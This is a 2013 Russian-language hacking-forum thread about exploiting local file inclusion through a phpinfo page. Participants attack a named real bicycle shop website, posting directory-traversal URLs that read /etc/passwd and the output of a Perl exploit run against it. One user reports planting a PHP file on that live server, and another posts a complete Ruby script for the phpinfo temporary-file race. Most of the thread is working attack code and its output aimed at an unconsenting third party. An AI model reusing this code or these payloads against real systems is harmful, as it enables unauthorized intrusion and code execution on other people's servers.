Помогите с LFI через phpinfo

Discussion in 'Песочница' started by psihoz26, 19 Sep 2013.

  1. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    ссылка на пхпинфо
    http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php

    ссылка с инклудом
    http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00

    юзаю слоит LFI через phpinfo
    взятый отсюда
    https://rdot.org/forum/showpost.php?p=12621&postcount=2



    Code:
    C:\Windows\system32>perl C:\lfi.pl http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php http://w
ww.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00
Generating huge headers         [headers ready]
Setting buffer size             [512]
Sending request                 [request sent]
HTTP/1.1 200 OK
Reading.........................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
......................................
Got filename: /tmp/phpROHVzd
Including...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html>
        <head>
                <title>Cloud 9 Cycles</title>
                <meta http-equiv="content-type" content="text/html; charset=utf-
8">
                <meta http-equiv="Content-Script-Type" content="text/javascript"
/>
                <meta name="description" content="" />
                <script type="text/javascript">
                        <!--
                                if (top.location!= self.location) {
                                        top.location = self.location.href
                                }
                        //-->
                </script>
                <script type="text/javascript" src="fx/js/jquery-1.3.2.js"></scr
ipt>
                <script type="text/javascript" src="fx/js/jquery.easing.1.3.js">
</script>
                <script type="text/javascript" src="fx/js/jquery.fancybox-1.3.1.
pack.js"></script>
                <script type="text/javascript" src="fx/js/pngfix.js"></script>
                <script type="text/javascript" src="fx/js/skrypty.js"></script>



                <link href="fx/css/jquery.fancybox-1.3.1.css" type="text/css" re
l="stylesheet" media="screen" />
            <link href="fx/css/main.css" type="text/css" rel="stylesheet" />
        </head>
        <body class="avant" style="background: url(fx/gfx/bg/../../../../../../t
mp/phpROHVzd .jpg) center no-repeat #000 fixed ">



                <div id="kontener">
                        <div id="top">
                        <div style="position: relative; top: 8px; left: 15px">
        <a href="http://www.facebook.com/pages/Cloud-9-Cycles/158029180960878"><
img style="margin: 0px 10px 0 0px;" src="fx/gfx/fb.gif"></a>
        <a href="http://twitter.com/#!/Cloud9cycles"><img style="margin: 0px 520
px 0 0px;" src="fx/gfx/tw.gif"></a>
                                <a href="https://twitter.com/Cloud9Cycles" class
="twitter-follow-button"  data-width="230px" data-button="grey" data-text-color=
"#FFFFFF" data-link-color="#00AEFF">Follow @Cloud9Cycles</a>
        <script src="//platform.twitter.com/widgets.js" type="text/javascript"><
/script>
        <iframe src="//www.facebook.com/plugins/like.php?href=http://www.faceboo
k.com/pages/Cloud-9-Cycles/158029180960878&amp;send=false&amp;layout=button_coun
t&amp;width=450&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;f
ont&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:h
idden; width:85px; height:21px;" allowTransparency="true"></iframe>
         <div class="clear"></div>

                        </div>
        <a href="index.php?content=home" title="Back to home page"><img src="fx/
gfx/logo.png" alt="Cloud9Cycles logo"></a>

                                <div id="baner-menu-box">
                                        <div id="baner-top" ></div>
                                        <div id="menu">
                                                <span>
                                                        <a href="index.php"
                                 title="Back to home page"         onmouseover="
this.style.color='#fff'"        onmouseout="this.style.color='#000'">home</a>  -
-
                                                        <a href="index.php?conte
nt=custom"       title="Custom builds"               onmouseover="this.style.col
or='#fff'"      onmouseout="this.style.color='#000'">custom builds</a>  --
                                                        <a href="index.php?conte
nt=bikes"          title="Browse our Bikes"          onmouseover="this.style.col
or='#fff'"      onmouseout="this.style.color='#000'">bikes</a>  --
                                                        <a href="index.php?conte
nt=service"  title="Servicing"                         onmouseover="this.style.c
olor='#fff'"    onmouseout="this.style.color='#000'">servicing</a>  --
                                                        <a href="index.php?conte
nt=rent"           title="Rent a bike"                     onmouseover="this.sty
le.color='#fff'"        onmouseout="this.style.color='#000'">bike rental</a>  --

                                                        <a href="http://www.clou
d9cycles.blogspot.com"           title="Cloud 9 Cycles blog"     onmouseover="th
is.style.color='#fff'"  onmouseout="this.style.color='#000'">blog</a>  --
                                                        <a href="index.php?conte
nt=contact"  title="Contact us"                        onmouseover="this.style.c
olor='#fff'"    onmouseout="this.style.color='#000'">contact us</a>
                                                </span>
                                        </div>
                                        <div id="baner-bottom" ></div>
                                                                        </div>
                        </div>
                        <div class="clear"></div>

                        <div id="content">
                                hello<br>

Keeping file /tmp/phpROHVzd in tmp, use it as long as you need it
...............................................................................

    патаюсь проинклудить /tmp/phpROHVzd

    http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../tmp/phpROHVzd%00

    и ничего не ывходит =(
    В чем может быть проблема??
     
    #1 psihoz26, 19 Sep 2013
  2. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Все работает, правда файл в /tmp/ живет не долго.
    У меня самописный сплоит под phpinfo, в качестве нагрузки добавил в него: <?php file_put_contents('/tmp/qwerty.lol','<?php phpinfo(); ?>'); ?>

    Результат:

    http://www.cloud(дщд)9cycles.com/index.php?content=../../../../../../tmp/qwerty.lol%00
     
    #2 yobanet, 19 Sep 2013
    1 person likes this.
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    не силён в перое, но кто может обьяснить какие манипуляции позволяют создать файл в папке темп?
     
    #3 qaz, 20 Sep 2013
  4. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Манипуляции по созданию файлов в /tmp выполняет phpinfo(), достаточно передать скрипту содержимое файлов, как то так.
     
    #4 yobanet, 20 Sep 2013
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ммм, а подробнее кто-то может обьяснить? какие параметры нужно передавать?
     
    #5 qaz, 20 Sep 2013
  6. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Как то так, не знаю как объяснить.

    Code:
    require 'socket'
require 'uri'
require 'net/http'

def main()

	#setting up
	puts "SETTING UP"
	
	target = 'http://www/phpinfo.php'										# phpinfo()
	lfi = 'http://www/include.php?file='									# LFI template like http://www.host.com/data/lfi.php?location={LFI}
	payloadLocation = 'payload.txt'											# payload
	junkFilesCount = 50														# tail
	recvBufferSize = 1024													# receive buffer size

	# just echo for u
	printDotted(' -target:')
	print("[#{target}]\n");
	
	printDotted(' -lfi:')
	print("[#{lfi}]\n");
	
	printDotted(' -payload:')
	print("[#{payloadLocation}]\n");
	
	printDotted(' -junk files count:')
	print("[#{junkFilesCount}]\n");
	
	printDotted(' -receive buffer size:')
	print("[#{recvBufferSize}]\n");
	
	# try to load payload
	begin
		printDotted('LOAD PAYLOAD')
		payload = IO.read(payloadLocation)
		print("[OK]\n")
	rescue
		print("[ERROR]\n")
		return
	end

	# payload
    file = "-----------------------------89q8834898293409rw29\r\n"
    file += "Content-Disposition: form-data; name=\"file_loader\"; filename=\"\r\npayload.txt\"\r\n"
    file += "Content-Type: text/plain\r\n\r\n"
    file += "#{payload}\r\n"
    file += "-----------------------------89q8834898293409rw29\r\n"
			
    # generate junk files
	printDotted('PREPARE JUNK')
	
	curJunkFiles = 0;
	
	for junkFiles in 0..junkFilesCount
		file += "-----------------------------89q8834898293409rw29\r\n"
		file += "Content-Disposition: form-data; name=\"file" + rand(10000).to_s + "\"; filename=\"\r\njunk" + rand(1000000).to_s * 10000 + ".txt\"\r\n"
		file += "Content-Type: text/plain\r\n\r\n"
		file += "superslow\r\n"
		file += "-----------------------------89q8834898293409rw29\r\n"
	end
	
	print("[OK]\n")
	
	printDotted('prepare headers')
	
	targetURI = URI(target)
	
	query = targetURI.path
	
	# add query if not empty
	if !targetURI.query.nil?
		query += '?' + targetURI.query
	end
	
	# headers
	req = "POST #{query} HTTP/1.0\r\n"
	req += "Content-Type: multipart/form-data; boundary=---------------------------89q8834898293409rw29\r\n"
	req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
	req += "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\r\n"
	req += "Host: #{targetURI.host}\r\n"
	req += "Content-Length: #{file.length}\r\n"
	req += "Connection: Close\r\n\r\n"
	
	req += file
	
	print("[OK]\n")

	# create tcp socket	
	sock = Socket.new(:INET, :STREAM)
	
	# and set receive buffer size
	sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_RCVBUF, recvBufferSize)	
	
	printDotted('connecting to')
	
	begin
		sock.connect(Socket.pack_sockaddr_in(80, targetURI.host))
	rescue
		print("[ERROR]\n")
		return false
	end
	
	print("[OK]\n")

	sock.write(req)
	
	data = ''
	payloadFound = false
	loaderFound = false
	payloadFileName = ''
	loaderFileName = ''
	
	while true
		
		printDotted("get next #{recvBufferSize} bytes")
		
		tmpData = sock.recv(recvBufferSize)
		
		print("[OK]\n")
		
		if tmpData.nil?
			break
		end
		
		data += tmpData
		
		tmpFileName = data.scan(/\[name\]\s=&gt;\spayload.txt\n\s\s\s\s\[type\]\s=&gt;\stext\/plain\n\s\s\s\s\[tmp_name\]\s=&gt;\s(.*?)\n\s\s\s\s\[error\]/)
		
		if tmpFileName.length > 0
			payloadFound = true
			payloadFileName = tmpFileName[0][0].clone
			
			printDotted('payload file location:')
			print('[' + payloadFileName + ']' + "\n")
			
			lfi += payloadFileName + '%00'
					
			lfiURI = URI(lfi)
	
			printDotted("Include #{payloadFileName}")
			
			response = Net::HTTP.get_response(lfiURI);
	
			if !response.is_a?(Net::HTTPOK) then 
				print("[ERROR]\n")
				return
			else
				print("[OK]\n")
			end			
			
			return
		end
		
	end
end

def printDotted(msg)
	print msg + "." * (50 - msg.length)
end

main()
     
    #6 yobanet, 20 Sep 2013
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Как тесен интернет то.
     
    #7 попугай, 21 Sep 2013
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    вопрос актуален
     
    #8 qaz, 10 Oct 2013
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    лол ))) как же ты писал сплоит, если не знаешь как работает уязвимость? :D
     
    _________________________
    #9 Expl0ited, 10 Oct 2013
  10. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    Это не phpinfo() выполняет подобные "манипуляции", а интерпретатор, пхпинфо же служит связующим звеном, позволяющим при определенных обстоятельствах увидеть путь к временному файлу.
     
    #10 wacky, 10 Oct 2013
  11. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Я сказал что я не могу грамотно объяснить, а не про то, что я не знаю как работает уязвимость. ;)
     
    #11 yobanet, 11 Oct 2013
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.